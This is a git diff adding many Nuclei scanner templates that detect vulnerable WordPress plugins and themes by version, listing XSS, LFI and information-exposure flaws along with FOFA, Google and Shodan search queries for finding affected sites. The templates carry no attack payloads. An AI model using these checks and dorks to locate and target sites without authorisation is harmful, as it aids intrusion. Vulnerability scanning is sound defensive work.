+    Contact Form Builder <= 4.10.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via livesite-pay Shortcode
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/5d1b419c-2276-415d-8c54-15da9125c442?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/contact-form-with-a-meeting-scheduler-by-vcita/"
+    google-query: inurl:"/wp-content/plugins/contact-form-with-a-meeting-scheduler-by-vcita/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,contact-form-with-a-meeting-scheduler-by-vcita,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/contact-form-with-a-meeting-scheduler-by-vcita/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "contact-form-with-a-meeting-scheduler-by-vcita"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 4.10.4')
\ No newline at end of file
diff --git a/poc/other/dollie.yaml b/poc/other/dollie.yaml
new file mode 100644
index 0000000000..8c22b32ae3
--- /dev/null
+++ b/poc/other/dollie.yaml
@@ -0,0 +1,59 @@
+id: dollie
+
+info:
+  name: >
+    Dollie Hub – Build Your Own WordPress Cloud Platform <= 6.2.0 - Authenticated (Contributor+) Post Disclosure
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/f29514d0-20a5-43f2-bf36-660579103220?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/dollie/"
+    google-query: inurl:"/wp-content/plugins/dollie/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,dollie,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/dollie/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "dollie"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 6.2.0')
\ No newline at end of file
diff --git a/poc/other/dp-intro-tours.yaml b/poc/other/dp-intro-tours.yaml
new file mode 100644
index 0000000000..3a5e9870ef
--- /dev/null
+++ b/poc/other/dp-intro-tours.yaml
@@ -0,0 +1,59 @@
+id: dp-intro-tours
+
+info:
+  name: >
+    Intro Tour Tutorial DeepPresentation <= 6.5.2 - Reflected Cross-Site Scripting
+  author: topscoder
+  severity: medium
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fe082a7-3d36-48b4-b81f-1e65e5ea430d?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/dp-intro-tours/"
+    google-query: inurl:"/wp-content/plugins/dp-intro-tours/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,dp-intro-tours,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/dp-intro-tours/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "dp-intro-tours"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 6.5.2')
\ No newline at end of file
diff --git a/poc/other/email-address-obfuscation.yaml b/poc/other/email-address-obfuscation.yaml
new file mode 100644
index 0000000000..1f818ec134
--- /dev/null
+++ b/poc/other/email-address-obfuscation.yaml
@@ -0,0 +1,59 @@
+id: email-address-obfuscation
+
+info:
+  name: >
+    Email Address Obfuscation <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via class Parameter
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/8b777b19-ca0a-4082-80ee-e18a31ba6308?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/email-address-obfuscation/"
+    google-query: inurl:"/wp-content/plugins/email-address-obfuscation/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,email-address-obfuscation,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/email-address-obfuscation/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "email-address-obfuscation"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/other/gutentor-d5f23171ec6d2a624b85c7c3791a4d2a.yaml b/poc/other/gutentor-d5f23171ec6d2a624b85c7c3791a4d2a.yaml
new file mode 100644
index 0000000000..8c01cd621a
--- /dev/null
+++ b/poc/other/gutentor-d5f23171ec6d2a624b85c7c3791a4d2a.yaml
@@ -0,0 +1,59 @@
+id: gutentor-d5f23171ec6d2a624b85c7c3791a4d2a
+
+info:
+  name: >
+    Gutentor – Gutenberg Blocks – Page Builder for Gutenberg Editor <= 3.3.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Countdown Widget
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/17ecebfd-b07f-415f-892f-e069ab84031a?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/gutentor/"
+    google-query: inurl:"/wp-content/plugins/gutentor/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,gutentor,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/gutentor/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "gutentor"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 3.3.9')
\ No newline at end of file
diff --git a/poc/other/listdom.yaml b/poc/other/listdom.yaml
new file mode 100644
index 0000000000..554c03cb9b
--- /dev/null
+++ b/poc/other/listdom.yaml
@@ -0,0 +1,59 @@
+id: listdom
+
+info:
+  name: >
+    Listdom – Business Directory and Classified Ads Listings WordPress Plugin <= 3.7.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode Parameter
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/9ccb47c2-5f4b-45ea-9c48-0a9042a2fce6?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/listdom/"
+    google-query: inurl:"/wp-content/plugins/listdom/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,listdom,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/listdom/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "listdom"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 3.7.0')
\ No newline at end of file
diff --git a/poc/other/lu-radioplayer-24c69778041edc97ab62887d5469ab7a.yaml b/poc/other/lu-radioplayer-24c69778041edc97ab62887d5469ab7a.yaml
new file mode 100644
index 0000000000..8cffb03e10
--- /dev/null
+++ b/poc/other/lu-radioplayer-24c69778041edc97ab62887d5469ab7a.yaml
@@ -0,0 +1,59 @@
+id: lu-radioplayer-24c69778041edc97ab62887d5469ab7a
+
+info:
+  name: >
+    LUNA RADIO PLAYER <= 6.24.11.07 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ed8a7f8-1af3-4b41-bfaf-fd1c35baa867?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/lu-radioplayer/"
+    google-query: inurl:"/wp-content/plugins/lu-radioplayer/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,lu-radioplayer,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/lu-radioplayer/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "lu-radioplayer"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 6.24.11.07')
\ No newline at end of file
diff --git a/poc/other/newsmunch-1eae09198c1f57697be0e29290d91cd2.yaml b/poc/other/newsmunch-1eae09198c1f57697be0e29290d91cd2.yaml
new file mode 100644
index 0000000000..2bb8c3a58a
--- /dev/null
+++ b/poc/other/newsmunch-1eae09198c1f57697be0e29290d91cd2.yaml
@@ -0,0 +1,59 @@
+id: newsmunch-1eae09198c1f57697be0e29290d91cd2
+
+info:
+  name: >
+    NewsMunch <= 1.0.35 - Authenticated (Contributor+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/1a2b0ff4-9471-4fd0-ac1a-ed5b7b4af4ff?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/themes/newsmunch/"
+    google-query: inurl:"/wp-content/themes/newsmunch/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-theme,newsmunch,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/themes/newsmunch/style.css"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Version: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Version: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "newsmunch"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.0.35')
\ No newline at end of file
diff --git a/poc/other/posti-shipping.yaml b/poc/other/posti-shipping.yaml
new file mode 100644
index 0000000000..0595744ce7
--- /dev/null
+++ b/poc/other/posti-shipping.yaml
@@ -0,0 +1,59 @@
+id: posti-shipping
+
+info:
+  name: >
+    Posti Shipping <= 3.10.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting via generate_notices_html Function
+  author: topscoder
+  severity: medium
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/079c77f1-3aab-4457-ad66-a2a2d9a55b2e?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/posti-shipping/"
+    google-query: inurl:"/wp-content/plugins/posti-shipping/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,posti-shipping,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/posti-shipping/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "posti-shipping"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 3.10.3')
\ No newline at end of file
diff --git a/poc/other/responsive-youtube-videos.yaml b/poc/other/responsive-youtube-videos.yaml
new file mode 100644
index 0000000000..9f4d82975b
--- /dev/null
+++ b/poc/other/responsive-youtube-videos.yaml
@@ -0,0 +1,59 @@
+id: responsive-youtube-videos
+
+info:
+  name: >
+    Responsive Videos <= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/f723be00-79f1-4a24-8502-2c5844ccc5de?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/responsive-youtube-videos/"
+    google-query: inurl:"/wp-content/plugins/responsive-youtube-videos/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,responsive-youtube-videos,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/responsive-youtube-videos/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "responsive-youtube-videos"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 2.1')
\ No newline at end of file
diff --git a/poc/other/sg-helper.yaml b/poc/other/sg-helper.yaml
new file mode 100644
index 0000000000..b995715cc6
--- /dev/null
+++ b/poc/other/sg-helper.yaml
@@ -0,0 +1,59 @@
+id: sg-helper
+
+info:
+  name: >
+    SG Helper <= 1.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via SVG File Upload
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/9016822f-f167-4225-8216-e74cd687443c?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/sg-helper/"
+    google-query: inurl:"/wp-content/plugins/sg-helper/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,sg-helper,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/sg-helper/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "sg-helper"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '1.0')
\ No newline at end of file
diff --git a/poc/other/stars-testimonials-with-slider-and-masonry-grid-f22ea0fab8779458702e21b3cfbd3810.yaml b/poc/other/stars-testimonials-with-slider-and-masonry-grid-f22ea0fab8779458702e21b3cfbd3810.yaml
new file mode 100644
index 0000000000..cc14ee59a4
--- /dev/null
+++ b/poc/other/stars-testimonials-with-slider-and-masonry-grid-f22ea0fab8779458702e21b3cfbd3810.yaml
@@ -0,0 +1,59 @@
+id: stars-testimonials-with-slider-and-masonry-grid-f22ea0fab8779458702e21b3cfbd3810
+
+info:
+  name: >
+    Free Responsive Testimonials, Social Proof Reviews, and Customer Reviews – Stars Testimonials <= 3.3.3 - Authenticated (Contributor+) Local File Inclusion
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/68250b6c-22c8-494f-b0b0-62b80cc4de0c?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/stars-testimonials-with-slider-and-masonry-grid/"
+    google-query: inurl:"/wp-content/plugins/stars-testimonials-with-slider-and-masonry-grid/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,stars-testimonials-with-slider-and-masonry-grid,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/stars-testimonials-with-slider-and-masonry-grid/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "stars-testimonials-with-slider-and-masonry-grid"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 3.3.3')
\ No newline at end of file
diff --git a/poc/other/wip-woocarousel-lite-58c536c08bbfd58c8c5df3f776075f47.yaml b/poc/other/wip-woocarousel-lite-58c536c08bbfd58c8c5df3f776075f47.yaml
new file mode 100644
index 0000000000..548b2fdbc1
--- /dev/null
+++ b/poc/other/wip-woocarousel-lite-58c536c08bbfd58c8c5df3f776075f47.yaml
@@ -0,0 +1,59 @@
+id: wip-woocarousel-lite-58c536c08bbfd58c8c5df3f776075f47
+
+info:
+  name: >
+    WIP WooCarousel Lite <= 1.1.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/50721265-dbbf-4032-a8d6-9cf42a986c0d?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/wip-woocarousel-lite/"
+    google-query: inurl:"/wp-content/plugins/wip-woocarousel-lite/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,wip-woocarousel-lite,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wip-woocarousel-lite/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "wip-woocarousel-lite"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.1.6')
\ No newline at end of file
diff --git a/poc/remote_code_execution/accounting-for-woocommerce-53b52ac147da254acf1412f550aa0c64.yaml b/poc/remote_code_execution/accounting-for-woocommerce-53b52ac147da254acf1412f550aa0c64.yaml
new file mode 100644
index 0000000000..5bc0e37e99
--- /dev/null
+++ b/poc/remote_code_execution/accounting-for-woocommerce-53b52ac147da254acf1412f550aa0c64.yaml
@@ -0,0 +1,59 @@
+id: accounting-for-woocommerce-53b52ac147da254acf1412f550aa0c64
+
+info:
+  name: >
+    Accounting for WooCommerce <= 1.6.6 - Reflected Cross-Site Scripting
+  author: topscoder
+  severity: medium
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/f34b7518-5cb3-4b4e-8b18-927c08c045f7?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/accounting-for-woocommerce/"
+    google-query: inurl:"/wp-content/plugins/accounting-for-woocommerce/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,accounting-for-woocommerce,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/accounting-for-woocommerce/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "accounting-for-woocommerce"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.6.6')
\ No newline at end of file
diff --git a/poc/remote_code_execution/order-status-for-woocommerce.yaml b/poc/remote_code_execution/order-status-for-woocommerce.yaml
new file mode 100644
index 0000000000..7d40650199
--- /dev/null
+++ b/poc/remote_code_execution/order-status-for-woocommerce.yaml
@@ -0,0 +1,59 @@
+id: order-status-for-woocommerce
+
+info:
+  name: >
+    Additional Custom Order Status for WooCommerce <= 1.6.0 - Reflected Cross-Site Scripting
+  author: topscoder
+  severity: medium
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/28267144-a709-4631-8925-69c6e0aca77c?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/order-status-for-woocommerce/"
+    google-query: inurl:"/wp-content/plugins/order-status-for-woocommerce/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,order-status-for-woocommerce,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/order-status-for-woocommerce/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "order-status-for-woocommerce"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.6.0')
\ No newline at end of file
diff --git a/poc/social/easy-facebook-likebox-premium.yaml b/poc/social/easy-facebook-likebox-premium.yaml
new file mode 100644
index 0000000000..861d02606c
--- /dev/null
+++ b/poc/social/easy-facebook-likebox-premium.yaml
@@ -0,0 +1,59 @@
+id: easy-facebook-likebox-premium
+
+info:
+  name: >
+    Multiple Plugins <= (Various Versions) - Authenticated (Contributor+) Stored DOM-Based Cross-Site Scripting via FancyBox JavaScript Library
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/d99d4b9a-aa09-434d-91a8-7afaa0e8b5db?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/easy-facebook-likebox-premium/"
+    google-query: inurl:"/wp-content/plugins/easy-facebook-likebox-premium/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,easy-facebook-likebox-premium,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/easy-facebook-likebox-premium/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "easy-facebook-likebox-premium"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 6.6.2')
\ No newline at end of file
diff --git a/poc/sql/related-post-50f470db25db3e9b2fd4bb5c39c48cf6.yaml b/poc/sql/related-post-50f470db25db3e9b2fd4bb5c39c48cf6.yaml
new file mode 100644
index 0000000000..10bf03a470
--- /dev/null
+++ b/poc/sql/related-post-50f470db25db3e9b2fd4bb5c39c48cf6.yaml
@@ -0,0 +1,59 @@
+id: related-post-50f470db25db3e9b2fd4bb5c39c48cf6
+
+info:
+  name: >
+    Related Posts, Inline Related Posts, Contextual Related Posts, Related Content By PickPlugins <= 2.0.58 - Sensitive Information Exposure
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/85f7c69d-0b48-47af-9451-3cfd4326ffe5?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/related-post/"
+    google-query: inurl:"/wp-content/plugins/related-post/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,related-post,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/related-post/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "related-post"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 2.0.58')
\ No newline at end of file
diff --git a/poc/web/webmail.yaml b/poc/web/webmail.yaml
new file mode 100644
index 0000000000..4a0f4112cd
--- /dev/null
+++ b/poc/web/webmail.yaml
@@ -0,0 +1,22 @@
+id: webmail
+info:
+  name: webmail
+  author: cn-kali-team
+  tags: detect,tech,webmail
+  severity: info
+  metadata:
+    fofa-query:
+    - title="axigen"
+    product: webmail
+    shodan-query:
+    - title:"axigen"
+    vendor: axigen
+    verified: true
+http:
+- method: GET
+  path:
+  - '{{BaseURL}}/'
+  matchers:
+  - type: regex
+    regex:
+    - (?mi)<title[^>]*>axigen.*?</title>
diff --git a/poc/wordpress/wp-ecards-invites.yaml b/poc/wordpress/wp-ecards-invites.yaml
new file mode 100644
index 0000000000..9585bb094d
--- /dev/null
+++ b/poc/wordpress/wp-ecards-invites.yaml
@@ -0,0 +1,59 @@
+id: wp-ecards-invites
+
+info:
+  name: >
+    WP eCards <= 1.3.904 - Authenticated (Contributor+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa8e1df5-2e8a-4c84-83f8-6f6d53d00356?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/wp-ecards-invites/"
+    google-query: inurl:"/wp-content/plugins/wp-ecards-invites/"
+    shodan-query: 'vuln:'
